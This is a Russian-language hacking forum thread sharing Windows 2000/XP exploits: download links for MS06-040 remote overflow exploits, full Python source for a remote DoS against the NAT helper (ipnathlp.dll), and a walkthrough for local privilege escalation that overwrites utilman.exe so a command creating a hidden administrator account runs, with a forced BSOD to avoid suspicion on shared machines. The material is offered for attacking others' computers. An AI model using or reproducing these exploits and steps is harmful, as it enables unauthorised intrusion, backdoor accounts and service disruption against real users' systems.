• XSS.stack #1 – первый литературный журнал от юзеров форума

Microsoft Windows 2k, XP exploits

MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040)
Часть метасплоита
:zns5: Скачать|Download
 
MS Windows PNG File IHDR Block Denial of Service Exploit PoC
вот как и просили. сплоит в атаче. описание в коментах сплоита.
 

Вложения

  • expl.txt
    14.2 КБ · Просмотры: 237
MS Windows CanonicalizePathName() Remote Exploit (MS06-040)
На WinXP SP1 предоставляет удаленный шелл, 2000 валит в ДоС (сам не проверял, но таковы заверения автора). Язык C, платформа *NIX
:zns5: Скачать|Download
 
Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
Код:
#!/usr/bin/python
# Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
# Bug discovered by h07 <h07@interia.pl>
# Tested on XP SP2 Polish
# Details:
#
# Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
#
# [Process svchost.exe, module ipnathlp]
# --> MOV DL, [EAX]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
##

from socket import *
from time import sleep

host = "192.168.0.1"
port = 53

buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0)
"\x03\x77\x77\x77" #
"\x06\x67\x6f\x6f" #
"\x67\x6c\x65\x03" #
"\x63\x6f\x6d\x00" # Name: www.google.com
"\x00\x01" # Type: A (Host address)
"\x00\x01" # Class: IN (0x0001)
)

s = socket(AF_INET, SOCK_DGRAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()

# EoF
 
как зашититься?
если есть DoS то уже есть и рут сплойт
[mod][not null:] Совсем не обязательно...не всегда удается переполнить буфер(стек, кучу, нужное подчеркнуть) так, чтобы передать управление шеллкоду[/mod]
 
Уязвимость в Microsoft XML Core Services может привести к выполнению произвольного кода на целевой машине.
3 ноября Microsoft сообщил, что в XMLHTTP 4.0 ActiveX Control, части Microsoft XML Core Services 4.0, обнаружена брешь, позволяющая выполнить код на уязвимой системе. Злоумышленнику нужно заманить жертву на сайт, страницы которого содержат вредоносный код.
Уязвимы все системы линейки NT 5.*
Технические подробности не сообщаются.
 
[not null:] Совсем не обязательно...не всегда удается переполнить буфер(стек, кучу, нужное подчеркнуть) так, чтобы передать управление шеллкоду
ну вероятность большая что он есть либо будет и надо быть осторожней а то будет опять массовое заражение как при lsas
 
Короче как я поднимаю "свои" права на вражескои тачке ....

Експлоит использует багу в msi.dll

100% работает на WinXP SP2 со многими обновлениями

Суть его такова -- вы можете переписать нутро любого файла в любой дире (системные в иом числе) к примеру utilman.exe (диспетчер служебных програм -- к нему есть exploits но они не пашут по XP SP2 ) cmd.exe но рано радоваться ведь если мы нажмем Win+U то cmd.exe запуститься с правами системы но окон cmd.exe
иметь не будет и упралять мы тоже не сможем (да кстати если мы хотим переписать Pinch вместо utilman.exe ни хрена не выидет, на все не Windows фаилы сплоит будет выдавать error )

ВСЕ ДЕЛО В SFC

Не падаем духом ....

Что мы делаем :

1. Загружаем еxe-к с содержимым типа system("net user 1 1 /add && net localgroup Администраторы /add 1") ---> С++

2.Создаем експлоит с путем

Наш фаил 123.exe перезаписать вместо system32\dllcache\utilman.exe

3. Запускаем

4. Перегружаем тачку или делаем BSOD (если она стоит например в клубе - чтобы не вызывать подозрений).Вы спросите зачем перегружать тачку -- да затем чтобы ма вновь могли запустить сплоит ведь мы msi.dll маленько повредили ))))

5. Создаем експлоит с путем

Наш фаил 123.exe перезаписать вместо system32\utilman.exe

(Поняли фичу --- и dllcache у нас 123.exe и в system32 тоже)

Ну потом заходим с важным видом нажимаем Win+U и у нас есть новоиспеченныи
админ
А от него и пляшем

Короче вариантов много.... Кто захочет -- тот догонит ничего сложного нет

А вот удаленно XP SP2 хакнуть проблема :(((

Но это работает...

Писал пока по сраному Dial-UP тянул 40 Mb

Удачи "хацкеры"

Сцылка на сплоит в оригинале (он кстати древний )
http://download.yousendit.com/6638B3BF12EBC86E
 
Повышение привилегий и отказ в обслуживании в ядре Windows
Злонамеренный локальный пользователь может вызвать отказ в обслуживании или выполнить код на целевой машине.
Оригинальное адвисори
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх